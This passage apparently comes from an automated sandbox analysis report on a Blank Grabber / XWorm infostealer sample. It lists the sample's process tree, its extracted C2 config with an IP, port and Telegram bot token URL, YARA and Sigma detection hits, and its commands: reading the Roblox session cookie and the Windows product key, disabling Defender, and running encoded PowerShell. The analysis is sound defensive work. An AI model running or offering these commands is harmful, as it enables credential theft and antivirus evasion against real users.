        • conhost.exe (PID: 4564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8288 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 8348 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8144 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8408 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 5628 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5592 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 7600 cmdline: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 7700 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 8632 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 4428 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7256 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 6036 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7340 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7432 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7252 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 5724 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7848 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8048 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7780 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7336 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • word.exe (PID: 8364 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 5288 cmdline: "C:\Users\user\AppData\Roaming\word.exe" MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 7316 cmdline: "C:\Users\user\AppData\Roaming\word.exe" MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 7956 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 4048 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 8684 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • word.exe (PID: 8912 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: 8D8BC4B4831CCCE11284D512630749C5)
  • cleanup
{"C2 url": ["198.23.219.104"], "Port": "7000", "Aes key": "<Xwormmm>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram URL": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage?chat_id=-1002219810475"}
{"C2 url": "https://api.telegram.org/bot7151126433:AAGnFv8HooRtSQ_cEeb4ANUyyyQ1LbT0Ehc/sendMessage"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
    C:\Users\user\AppData\Roaming\word.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\word.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\Users\user\AppData\Roaming\word.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0xec06:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0xeca3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0xedb8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0xdc9b:$cnc4: POST / HTTP/1.1
        SourceRuleDescriptionAuthorStrings
        00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
              00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
                00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
                  Click to see the 17 entries
                  SourceRuleDescriptionAuthorStrings
                  15.0.bound.exe.2f0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                    15.0.bound.exe.2f0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      15.0.bound.exe.2f0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                      • 0xec06:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                      • 0xeca3:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                      • 0xedb8:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                      • 0xdc9b:$cnc4: POST / HTTP/1.1

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'", ProcessId: 4248, ProcessName: cmd.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 5544, ProcessName: cmd.exe
                      Source: Process startedAuthor: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\sB2ClgrGng.exe", ParentImage: C:\Users\user\Desktop\sB2ClgrGng.exe, ParentProcessId: 2892, ParentProcessName: sB2ClgrGng.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *", ProcessId: 5592, ProcessName: cmd.exe
                      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7848, StartAddress: 213032B0, TargetImage: C:\Windows\System32\tree.com, TargetProcessId: 7848
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7072, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe', ProcessId: 7292, ProcessName: powershell.exe
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\sB2ClgrGng.exe, ProcessId: 2892, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr
                      Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AY